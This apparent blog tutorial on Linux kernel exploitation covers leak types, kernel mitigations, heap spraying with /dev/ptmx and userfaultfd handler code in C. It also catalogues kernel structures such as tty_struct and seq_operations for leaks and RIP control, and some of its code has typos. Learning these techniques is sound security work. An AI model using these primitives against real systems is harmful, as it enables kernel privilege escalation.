[MENU] | |||||||||
[THOUGHTS] | [TECH RESOURCES] | [TRASH TALK] | |||||||
[DANK MEMES] | [FEATURED ARTISTS] | [W] |
When someone figures out how to take advantage of a bug, it becomes a security issue. If you are the person that found a bug in the kernel land but trying to figure out what to do next, this post may help you in the way.
From "Stairway to succesful kernel exploitation, by Enrico Perla, Massimiliano Oldani"; To develop a good exploit, we must understand the vulnerability we are targeting, the kernel subsystems involved and the techniques we are using.
First things first, a good exploit is a good exploit when it is;
* Reliable
* Safe
* Effective
* It must be narrowed down, as much as possible, the list of preconditions which must be met for
the exploit to work.
* The part of the exploit might crash the machine, must be identified.
* Exploit must leave the machine in a stable state.
* It is not a must but exploit should be portable, which means it should work on as many targets
as possible.
So get back to subject. In a security view, the question is "what kind of advantages we are looking for?"
We are looking for;
* Memory leaks
* Stack addresses/values
* Heap addresses/values
* Kernel data segment
* Arbitrary Read/Write
* RIP Control
Stack Leak
* Stack addresses/values are very useful type of leak because there may not be any other way to know
where the stack is. If it is enough sufficient leak, it would reveal the a canary protection
and its values. Since the kernel stack is allocated one and forever, this leak is very powerful.
Heap Leak
* The generic case of heap leak is the ability to leak memory around an object, either before after.
This leak may expose information about the state of the previous/next object.
Kernel Data Segment Leak
* The data segment of the kernel is created at compilation time. If any leak occurs in this segment,
you may expose the value of some kernel configuration or retrieve some kernel symbols.
Even if you couldn't do that, you will be given a precise offset to use in another steps in your
exploit code. Although the leak from here is convenient, it is not the only information that will
make your exploit reliable. It will help you in triggering steps of your exploit but not in earlier
stages.
Arbitrary Write
* We need to be able to transfer our intention as much as we get information from the kernel land.
With gathered information from leaks, we need to push some data into kernel land with intention of
make kernel do something unintended. To do so, we need to find a memory area which is in our control.
In most cases, we might be limited in the amount of space we can use, so be careful about the size of
your payload and be sure about where it will land to. Arbitrary read/write can occur in these example
scenerios;
* Buffer copy without checking size of input (Buffer overflow)
* Buffer Underflow
* Write-what-where condition
* Incorrect calculation of buffer size
* Access of memory location before start/after end of buffer
* Buffer access with incorrect length value
* Free of memory not on the Heap
* Double free
* Use after free
* Race conditions
Also worth to mention now, when you are trying to get advantages from a bug, you will be restricted with linux kernel mitigation features as like in userland mitigations. A few of them are;
* Kernel stack cookies: Exactly the same as stack canaries on userland.
* Kernel address space layout randomization (KASLR): Also like ASLR on userland.
It randomizes the base address each time system is booted.
* Supervisor mode execution proection (SMEP): This feature marks all the userland pages
in the page table as NX when the process in kernel land.
* Supervisor mode access prevention(SMAP): This feature marks all the userland pages in the
page table as non accessible when the process in kernel land.
* (KPTI): With this feature, kernel separates user land and kernel land page tables entirely.
User land page table contains a minimal set of kernel land addresses, minimize the surface.
As it is noted, we need reliability and often times it depends on memory sequences and aligments. Aligments of memory and the state of a operating system introduce a lot of randomness when we are dealing with a bug. The common way to deal with this chaos, is putting a lot of NOP's or allocate a lot of memory. Allocating a large amount of memory is called heap spraying. A heap spray can be used to compsensate for this chaos and can increase the chances of succesful exploitation. Also the start location of a large heap allocation is more predictable and consecutive allocations are approximately sequential. This means that the sprayed heap will be in the same location every time the heap spray is run.
- // Simple heap spraying example;
- for(int i= 0; i < 0x100; ++i)
- ptmx[i] = open("/dev/ptmx", ORDWR | O_NOCTTY); // reserve tty_struct
- for(int i= 0; i < 0x100; ++i)
- close(ptmx[i]);
Depending on which mitigations are enabled and the vulnerable driver functions available, getting an advantage from a bug is changing. Let's say you have found a bug that causes "Use After Free" but the size of you can allocate is fixed. Then you will need to find "usable" objects with the matching size of your allocation size from kernel. Before finding objects that are usable, let's take a look at which conditions can be ideal, explained by Vitaly Nikolenko in "Linux Kernel universal heap spray" blog.
- Object size is controlled by the user.
- No restrictions even for very small objects (kmalloc-8)
- Object content is controlled by the user.
- No uncontrolled header at the beginning of the object.
- The target object should "stay" in the kernel during the exploitation stage.
For the first and second conditions, we need kmalloc-> kfree execution paths to achieve that control of an object state. For example, setxattr is a way to do that. For the last ideal condition, we need to hold that object in the memory while our code is running. One example way to hold that object is userfaultfd.
userfaultfd usage idea is basically handling page faults in user space. For example, any meaningless read/write access to wrong mmap() allocation will trigger page fault handler in kernel space. With userfaultfd, these faults can be processed in user space by a seperate thread.
The only problem in this approach is that main user-space execution is suspended as well when page fault is handled in a seperate thread. No worries, this can be solved by forking another process or with a second thread.
- //Here is an example how you can setup a page handler;
- #define ulong unsigned long
- #define errexit(msg) \
- do { \
- perror(msg); \
- exit(EXIT_FAILURE); \
- } while (0)
-
- void *fault_handler_thread(void *arg) {
- //
- ulong value;
- struct uffd_msg msg;
- long uffd;
- static char *page = NULL;
- struct uffdio_copy copy;
- int len, i, page_size = sysconf(_SC_PAGE_SIZE);
-
- if (page == NULL) {
- page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
- MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
- if (page == MAP_FAILED)
- errexit("mmap (userfaultfd)");
- }
-
- uffd = (long)arg;
-
- for (;;) {
- struct pollfd polfd;
- polfd.fd = uffd;
- polfd.event = POLLIN;
- // is it in good state?
- len = poll(& polfd, 1, -1);
-
- if (len == -1)
- errexit("poll");
- printf("[+] fault_handler_thread():\n");
- printf("poll() returns: nready = %d; "
- "POLLIN = %d; POLLERR = %d\n",
- len, (pollfd.revents & amp; POLLIN) != 0,
- (pollfd.revents & amp; POLLERR) != 0);
-
- len = read(uffd, & msg, sizeof(msg));
- if (len == 0)
- errexit("userfaultfd EOF");
- if (len == -1)
- errexit("read");
- if (msg.event != UFFD_EVENT_PAGEFAULT)
- errexit("msg.event");
-
- printf("[+] UFFD_EVENT_PAGEFAULT event: \n");
- printf(" flags = 0x%lx\n", msg.arg.pagefault.flags);
- printf(" address = 0x%lx\n", msg.arg.pagefault.address);
- //
- uffdio_copy.src = (unsigned long)page;
- uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & amp;
- ~(page_size - 1);
- uffdio_copy.len = page_size;
- uffdio_copy.mode = 0;
- uffdio_copy.copy = 0;
- if (ioctl(uffd, UFFDIO_COPY, & uffdio_copy) == -1)
- errexit("ioctl: UFFDIO_COPY");
- printf("[+] uffdio_copy.copy = %ld\n", uffdio_copy.copy);
- }
- }
- // Then create like this
- void setup_pagefault(void *addr, unsigned size) {
- long uffd;
- pthread_t th;
- struct uffdio_api api;
- struct uffdio_register reg;
- int s;
-
- // new userfaulfd
- page_size = sysconf(_SC_PAGE_SIZE);
- uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
- if (uffd == -1)
- errexit("userfaultfd");
-
- // enabled uffd object
- api.api = UFFD_API;
- api.features = 0;
- if (ioctl(uffd, UFFDIO_API, &api) == -1)
- errexit("ioctl: UFFDIO_API");
-
- // register memory address
- reg.range.start = (unsigned long)addr;
- reg.range.len = size;
- reg.mode = UFFDIO_REGISTER_MODE_MISSING;
- if (ioctl(uffd, UFFDIO_REGISTER, ®) == -1)
- errexit("ioctl: UFFDIO_REGITER");
-
- // monitor page fault
- s = pthread_create(&th, NULL, fault_handler_thread, (void *)uffd);
- if (s != 0)
- errexit("pthread_create");
- }
- // call part
- int main(void) {
- // Allocate memory for userfaultfd
- void *pages = (void *)mmap((void *)0x77770000, 0x4000, PROT_READ | PROT_WRITE,
- MAP_FIXED | MAP_PRIVATE | MAP_ANON, -1, 0);
- if ((unsigned long)pages != 0x77770000)
- errexit("mmap (0x77770000)");
- setup_pagefault(pages, 0x4000);
- }
As mentioned earlier, if the size of memory that you can allocate is fixed, then you will need to find "usable" objects with the matching size of your allocation size from kernel. Below you will find some usable(according to your needs) objects that ptr-yudai found and explained briefly. (the original blog post link is at bottom of the page)
(ptr-yudai's list is very informative and well explained in his blog but I would like to expand it if there are new structures that can be useful. The problem is I am not eligible enough to search for these things for now. I will study it and i will look for what I can do. Starting here, it is just translated from ptr-yudai's blog and referenced by linux source code. I will work on those later.)
- -
- - shm_file_data
- - seq_operations
- - msg_msg (+ user-supplied data)
- - subprocess_info
- - cred
- - file
- - timerfd_ctx
- - tty_struct
- -
- - msg_msg
- - setxattr
- - sendmsg
- struct shm_file_data {
- int id;
- struct ipc_namespace *ns;
- struct file *file;
- const struct vm_operations_struct *vm_ops;
- };
Size: 0x20 (kmalloc-32)
Base: *ns and *vm_ops point to kernel data area, leak is possible.
Heap: Can leak because *file points to the heap area.
RIP Control: No.
Allocation: map shared memory with shmat
- struct seq_operations {
- void * (*start) (struct seq_file *m, loff_t *pos);
- void (*stop) (struct seq_file *m, void *v);
- void * (*next) (struct seq_file *m, void *v, loff_t *pos);
- int (*show) (struct seq_file *m, void *v);
- };
Size: 0x20 (kmalloc-32)
Base: Can leak 4 function pointers
Heap: No
Stack: No
RIP: Possible
Allocation: Opening a file that uses single_open (ex: /proc/self/stat)
Release: Close that file
- struct msg_msg {
- struct list_head m_list;
- long m_type;
- size_t m_ts; /* message text size */
- struct msg_msgseg *next;
- void *security;
- /* the actual message follows immediately */
- };
Size: Various (0x31 to 0x1000 / kmalloc-64 and above)
Base: No
Heap: Can leak because struct msg_msgeg *next points to previously sent message.
Stack: No
RIP: No
subprocess_info
Defined in umh.h- struct subprocess_info {
- struct work_struct work;
- struct completion *complete;
- const char *path;
- char **argv;
- char **envp;
- struct file *file;
- int wait;
- int retval;
- pid_t pid;
- int (*init)(struct subprocess_info *info, struct cred *new);
- void (*cleanup)(struct subprocess_info *info);
- void *data;
- } __randomize_layout;
Size: 0x60 (kmalloc-128)
Base: work.func points to call_usermodehelper_exec_work, leak is possible
Heap: Possible
Stack: No
RIP: RIP can be obtained via rewriting cleanup with race condition.
- struct cred {
- atomic_t usage;
- #ifdef CONFIG_DEBUG_CREDENTIALS
- atomic_t subscribers; /* number of processes subscribed */
- void *put_addr;
- unsigned magic;
- #define CRED_MAGIC 0x43736564
- #define CRED_MAGIC_DEAD 0x44656144
- #endif
- kuid_t uid; /* real UID of the task */
- kgid_t gid; /* real GID of the task */
- kuid_t suid; /* saved UID of the task */
- kgid_t sgid; /* saved GID of the task */
- kuid_t euid; /* effective UID of the task */
- kgid_t egid; /* effective GID of the task */
- kuid_t fsuid; /* UID for VFS ops */
- kgid_t fsgid; /* GID for VFS ops */
- unsigned securebits; /* SUID-less security management */
- kernel_cap_t cap_inheritable; /* caps our children can inherit */
- kernel_cap_t cap_permitted; /* caps we're permitted */
- kernel_cap_t cap_effective; /* caps we can actually use */
- kernel_cap_t cap_bset; /* capability bounding set */
- kernel_cap_t cap_ambient; /* Ambient capability set */
- #ifdef CONFIG_KEYS
- unsigned char jit_keyring; /* default keyring to attach requested
- * keys to */
- struct key __rcu *session_keyring; /* keyring inherited over fork */
- struct key *process_keyring; /* keyring private to this process */
- struct key *thread_keyring; /* keyring private to this thread */
- struct key *request_key_auth; /* assumed request_key authority */
- #endif
- #ifdef CONFIG_SECURITY
- void *security; /* subjective LSM security */
- #endif
- struct user_struct *user; /* real user ID subscription */
- struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
- struct group_info *group_info; /* supplementary groups for euid/fsgid */
- /* RCU deletion */
- union {
- int non_rcu; /* Can we skip RCU deletion? */
- struct rcu_head rcu; /* RCU deletion hook */
- };
- } __randomize_layout;
Size: 0xa8 (kmalloc-192)
Base: No
Heap: Possible through session_keyring
Stack: No
RIP: No
- struct file {
- union {
- struct llist_node fu_llist;
- struct rcu_head fu_rcuhead;
- } f_u;
- struct path f_path;
- struct inode *f_inode; /* cached value */
- const struct file_operations *f_op;
-
- /*
- * Protects f_ep_links, f_flags.
- * Must not be taken from IRQ context.
- */
- spinlock_t f_lock;
- enum rw_hint f_write_hint;
- atomic_long_t f_count;
- unsigned int f_flags;
- fmode_t f_mode;
- struct mutex f_pos_lock;
- loff_t f_pos;
- struct fown_struct f_owner;
- const struct cred *f_cred;
- struct file_ra_state f_ra;
-
- u64 f_version;
- #ifdef CONFIG_SECURITY
- void *f_security;
- #endif
- /* needed for tty driver, and maybe others */
- void *private_data;
-
- #ifdef CONFIG_EPOLL
- /* Used by fs/eventpoll.c to link all the hooks to this file */
- struct list_head f_ep_links;
- struct list_head f_tfile_llink;
- #endif /* #ifdef CONFIG_EPOLL */
- struct address_space *f_mapping;
- errseq_t f_wb_err;
- } __randomize_layout
- __attribute__((aligned(4))); /* lest something weird decides that 2 is OK */
Size: (kmalloc-256)
Base: f_op points to data area of the kernel, so it's possible.
Heap: ?
Stack: ?
Allocation: Create shared memory with shmget
Release: Discard with shmctl
Note: RIP control is possible if you can rewrite F_OP and call shmctl.
- struct timerfd_ctx {
- union {
- struct hrtimer tmr;
- struct alarm alarm;
- } t;
- ktime_t tintv;
- ktime_t moffs;
- wait_queue_head_t wqh;
- u64 ticks;
- int clockid;
- short unsigned expired;
- short unsigned settime_flags; /* to show in fdinfo */
- struct rcu_head rcu;
- struct list_head clist;
- spinlock_t cancel_lock;
- bool might_cancel;
- };
Size: (kmalloc-256)
Base: tmr.function points to timerfd_tmrproc so it's possible.
Heap: Can leak (from tmr.base)
Stack: No
RIP: No
- struct tty_struct {
- int magic;
- struct kref kref;
- struct device *dev;
- struct tty_driver *driver;
- const struct tty_operations *ops;
- int index;
-
- /* Protects ldisc changes: Lock tty not pty */
- struct ld_semaphore ldisc_sem;
- struct tty_ldisc *ldisc;
-
- struct mutex atomic_write_lock;
- struct mutex legacy_mutex;
- struct mutex throttle_mutex;
- struct rw_semaphore termios_rwsem;
- struct mutex winsize_mutex;
- spinlock_t ctrl_lock;
- spinlock_t flow_lock;
- /* Termios values are protected by the termios rwsem */
- struct ktermios termios, termios_locked;
- struct termiox *termiox; /* May be NULL for unsupported */
- char name[64];
- struct pid *pgrp; /* Protected by ctrl lock */
- struct pid *session;
- unsigned long flags;
- int count;
- struct winsize winsize; /* winsize_mutex */
- unsigned long stopped:1, /* flow_lock */
- flow_stopped:1,
- unused:BITS_PER_LONG - 2;
- int hw_stopped;
- unsigned long ctrl_status:8, /* ctrl_lock */
- packet:1,
- unused_ctrl:BITS_PER_LONG - 9;
- unsigned int receive_room; /* Bytes free for queue */
- int flow_change;
-
- struct tty_struct *link;
- struct fasync_struct *fasync;
- wait_queue_head_t write_wait;
- wait_queue_head_t read_wait;
- struct work_struct hangup_work;
- void *disc_data;
- void *driver_data;
- spinlock_t files_lock; /* protects tty_files list */
- struct list_head tty_files;
-
- #define N_TTY_BUF_SIZE 4096
-
- int closing;
- unsigned char *write_buf;
- int write_cnt;
- /* If the tty has a pending do_SAK, queue it here - akpm */
- struct work_struct SAK_work;
- struct tty_port *port;
- } __randomize_layout;
Size: 0x2e0 (kmalloc-1024)
Base: *ops points to ptm_unix98_ops so it's possible.
Heap: Various leaks are possible
Stack: No
Allocation: Open /dev/ptmx
Release: Close /dev/ptmx
RIP: RIP can be controlled by rewriting *ops
(msg_msg: already mentioned.)
Size: Various (<=65535)
Reserve: Call with the pointer and size
Notes: Use with userfaultfd (First 48 bytes cannot be written)
Size: Various(>=2)
Reserve: Call with the pointer and size
Notes: Combine with userfaultfd
- https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628
- https://duasynt.com/blog/linux-kernel-heap-spray
- https://smallkirby.hatenablog.com/archive
- https://github.com/smallkirby/kernelpwn
- Stairway to Successful Kernel Exploitation Book Chapter 3